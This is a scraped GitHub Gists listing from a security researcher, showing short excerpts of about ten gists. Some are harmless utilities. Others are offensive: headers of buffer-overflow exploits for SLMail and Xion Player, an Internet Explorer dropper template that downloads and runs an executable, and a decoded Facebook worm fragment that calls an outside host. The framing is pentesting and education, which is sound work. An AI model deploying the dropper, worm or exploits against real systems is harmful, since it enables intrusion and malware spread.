Skip to content

Instantly share code, notes, and snippets.

View mgeeky's full-sized avatar
💭
Wanna sip a sencha?

Mariusz Banach mgeeky

💭
Wanna sip a sencha?
2.3k followers · 95 following
  • Binary-Offensive.com
  • Poland
  • X @mariuszbit
View GitHub Profile
@mgeeky
mgeeky / urlencoded2dict.py
Created March 31, 2016 12:31
Convert urlencoded string into dictonary (json)
def urlencoded2dict(txt):
s = '{' + re.sub("([^=]+)=([^&]*)&?", r'"\1":"\2", ', txt) + '}'
return json.loads(s.replace(', }', '}'))
@mgeeky
mgeeky / sshcommand.py
Created April 18, 2016 14:44
sshcommand.py - ripped out from Violent Python - by TJ O'Connor
#
# Pexpect driven SSH Command sending script.
# Based on:
# Violent Python, by TJ O'Connor
#
import pexpect
from sys import argv, exit
PROMPT = ['#', '>>>', '> ', '\$ ']
@mgeeky
mgeeky / ajax_crawl.js
Last active May 5, 2016 15:38
AJAX Crawling bookmarklet - useful bookmarklet for fetching accessible, in-scope URLs from the webpage (and it's sitemap.xml) in order to let them be captured in local proxy like Burp. This in turn is useful for populating local proxy's history and it's website resources tree. Must-have during website pentesting.
/* Copy the below line to your bookmarklet: */
javascript:(function(){MAX_URLS_TO_FETCH = 512; limit_reached = false; function decodeHtml(html) {txt = document.createElement('textarea'); txt.innerHTML = html; return txt.value; } String.prototype.endsWith = function(suffix) {return this.indexOf(suffix, this.length - suffix.length) !== -1; }; function normalizeUri(uri) {if (!uri || uri.length < 1) {return ''; } if(uri.toLowerCase().startsWith('javascript:') || uri.toLowerCase().startsWith('mailto:') || uri.toLowerCase().startsWith('phone:') || uri.toLowerCase().startsWith('tel:') || uri.toLowerCase().startsWith('phone:') || uri.toLowerCase().startsWith('#') ) {return ''; } orig = location.origin; if (uri.startsWith('http') && !uri.startsWith(orig)) {if (uri.substr(uri.indexOf(':')).startsWith(orig.substr(orig.indexOf(':')))) {return uri; } return ''; } if (uri.startsWith(orig)) {return uri; } if (uri.startsWith('//')) {return location.protocol + uri; } if (uri.startsWith('"') || uri.startsWith("'") ) {return ''
@mgeeky
mgeeky / burp-curl-beautifier.py
Created August 11, 2016 14:40
Simple script for making "Copy as curl command" output in system's clipboard a little nicer, at least for me.
#!/usr/bin/python
#
# Simple script for making "Copy as curl command" output in system's clipboard a little nicer\
# To use it:
# - firstly right click on request in BurpSuite
# - select "Copy as curl command"
# - then launch this script.
# As a result, you'll have a bit nicer curl command in your clipboard.
#
@mgeeky
mgeeky / slmail-dep-bypass-example.py
Last active August 12, 2016 02:21
Example of an old DEP Bypass technique on a SLMail 5.5 stack-based overflow
#
# Classic & old SLMail 5.5 PASS stack-based buffer overflow revisited for DEP Bypass
# via ROP to ZwSetInformationProcess with `leave`-based stack pivotting.
# Not overcoming ASLR, tested on Windows XP SP3 English.
#
# After launching, hit: $ nc victim 4444
#
# Prepared for educational purposes, if someone wants to go through first DEP Bypasses on
# this particular vulnerability.
#
@mgeeky
mgeeky / xion-1-unicode-exploit.py
Last active August 18, 2016 13:29
Xion Player (r2 studios) 1.0 121 build example of unicode-compatible venetian shellcode/exploit (Corelan.be Exploit Writing Tutorial, part 7)
#!/usr/bin/python
#
# Corelan.be Exploit Writing tutorial part 7. Unicode
# Example 1: r2 Studios Xion 1.0 121 build stack-based unicode overflow
#
# Example of unicode-compatible exploit.
# No ASLR compatible, no DEP either.
# Tested on Windows XP SP3.
#
@mgeeky
mgeeky / pastebin-upload.py
Last active August 21, 2016 13:31
Pastebin uploader. Just register global hotkey for it (like Win+Y) and have it upload code from clipboard and return URL.
#!/usr/bin/env python
#
# Simple bit-ly URL shortener.
# Usage:
# python bit-ly.py <URL>
# or by having a URL address in clipboard.
#
import bitly_api
from Tkinter import Tk
@mgeeky
mgeeky / backdoor-drop.js
Created September 8, 2016 10:20
Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments
<script>
var SRC = "";
var CMDLINE = "";
var out = Math.random().toString(36).substring(7) + ".exe";
var axo = this.ActiveXObject;
var wshell = new axo("WScript.Shell");
var path = wshell.ExpandEnvironmentStrings("%TEMP%") + "/" + out;
var xhr = new axo("MSXML2.XMLHTTP");
xhr.onreadystatechange = function () {
@mgeeky
mgeeky / extract-vmlinux.sh
Created November 14, 2016 14:03
extract-vmlinux - Extract uncompressed vmlinux from a kernel image (source: https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux )
#!/bin/sh
# ----------------------------------------------------------------------
# extract-vmlinux - Extract uncompressed vmlinux from a kernel image
#
# Inspired from extract-ikconfig
# (c) 2009,2010 Dick Streefland <dick@streefland.net>
#
# (c) 2011 Corentin Chary <corentin.chary@gmail.com>
#
# Licensed under the GNU General Public License, version 2 (GPLv2).
@mgeeky
mgeeky / svg-spammy.js
Last active November 30, 2016 13:27
(WIP) Decoded and refactored source code of actively infecting Facebook worm spreading via SVG attachments in PMs of infected victim and via malicious Chrome extension
function registerNewZombieUserAndStartFacebookInfection() {
var y = new window.XMLHttpRequest;
y.open("GET", "https://uye.io/php/start.php?ext=me&hash=" + hashParameter + "&user=" + username);
y.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
y.send();
y.onreadystatechange = function () {
if (4 == y.readyState && 200 == y.status) {
var l = JSON.parse(y.responseText);
config = l;
console.log(config);